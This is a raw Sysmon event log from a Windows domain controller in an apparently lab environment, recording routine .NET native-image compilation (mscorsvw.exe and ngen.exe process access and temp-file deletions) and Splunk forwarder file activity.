21:07:05.996{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8705-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.964{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8705-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.964{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8705-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.964{4DB9351A-A279-60D3-8605-00000000CF01}6984NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5TNA1AQ1C4\Microsoft.Windows.FileServer.Management.Common.ni.dll.auxMD5=3DD5A6D170D64DB19ECA50A74DBDE002,SHA256=D1C851CD18507312AB2FD14D1C1D1A88D5B8821E8C8A76CAD08D8187BD3665C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023192Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.964{4DB9351A-A279-60D3-8605-00000000CF01}6984NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5TNA1AQ1C4\Microsoft.Windows.FileServer.Management.Common.ni.dllMD5=CE975114FE64C5922A09253F1E76FE02,SHA256=D2781489B62B2595B9DEB7EECE21171B1EBEF5E554C3B270017F9F696B9B11DA,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023191Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.949{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8605-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023190Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.917{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8605-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.917{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8605-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.917{4DB9351A-A279-60D3-8505-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B9CTZC9G1H\Microsoft.Windows.DSC.CoreConfProviders.ni.dll.auxMD5=EED043638B1501762383D70467223FB4,SHA256=4BE50FE5F93CAC62F553F3212C617C949522299124CB5B3332F1752E61458521,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.917{4DB9351A-A279-60D3-8505-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B9CTZC9G1H\Microsoft.Windows.DSC.CoreConfProviders.ni.dllMD5=639DC5A63D7C8B6654D4FB8EEF9AFB33,SHA256=7885BFA8080848E2FAB301B22580CD6A1ECAF7D0AD04462E8840C5A1ED837E7C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.902{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB08BD93C16FD5274298D5AC312CAF9C,SHA256=375D8FCA231EC75AA800535D976E6F337D68855D88D53179EAE25A22DD4C0AD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.886{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E128E6D01B7C298489315DF57D2241,SHA256=C5526A8FFD5282C9A2F83C0ADD4C8B81A47412B49B8BA8705A75976D93E5D065,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.871{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C25708CF0C5CCEB0EB7D1581DCAE48C,SHA256=216185BC6EC5541ACA0EBA3D5D9F4317FB67CC799736523C0700B48C49D3F7B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.808{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8505-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.777{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8505-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.777{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8505-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.777{4DB9351A-A279-60D3-8405-00000000CF01}6504NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5B24G40NYB\Microsoft.Windows.Dns.ni.dll.auxMD5=575836F3C94E048A75F253E6DF6013C4,SHA256=E82813A648CD89758F946BF1B98D6E86AA21E0ADB2ADD1777F65F6CAFF74FD7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.777{4DB9351A-A279-60D3-8405-00000000CF01}6504NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5B24G40NYB\Microsoft.Windows.Dns.ni.dllMD5=AAD18A16B38E4B977C13D3C4202F5ACE,SHA256=F6D958906E3A451A84B1C2C94D3EDCD034D67D7EC238B8FFB739407FE564E8F3,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.761{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8405-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.746{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8405-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.746{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8405-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.746{4DB9351A-A279-60D3-8305-00000000CF01}5712NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LYRTDFXALT\Microsoft.Windows.Diagnosis.TroubleshootingPack.ni.dll.auxMD5=83C3AEF2694E7A532E543ECBBB85BDC4,SHA256=FC7BC5E37F130C787AAC249B7FCE45C8C6F30C45654AA9B9CCD98068DC8DA0F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.730{4DB9351A-A279-60D3-8305-00000000CF01}5712NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LYRTDFXALT\Microsoft.Windows.Diagnosis.TroubleshootingPack.ni.dllMD5=82B953BD78953B5B762C22921ED073CD,SHA256=E6CD136D3E76D9399ACDCB90556D95D75A092A8B557AC6F99DEEFF8DC7181A2A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8305-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.714{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8305-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.714{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8305-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.699{4DB9351A-A279-60D3-8205-00000000CF01}2632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VUACNGCW3V\Microsoft.Windows.Diagnosis.SDHost.ni.dll.auxMD5=54E620C739DDC7A6F80C83BDA3928C02,SHA256=7F0FF8EE91A1F53A5C97A8B382F686D95F26739CFD28210329C45647B85A01C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.699{4DB9351A-A279-60D3-8205-00000000CF01}2632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VUACNGCW3V\Microsoft.Windows.Diagnosis.SDHost.ni.dllMD5=53CE2E8B7210AE5D9C321B4861183C60,SHA256=99E91D74556BA62CB179DAC1A9D9A028FBEF8AA5479AD4D918E2B8F8CFAB3D35,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.683{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8205-00000000CF01}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.683{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8205-00000000CF01}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.683{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8205-00000000CF01}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.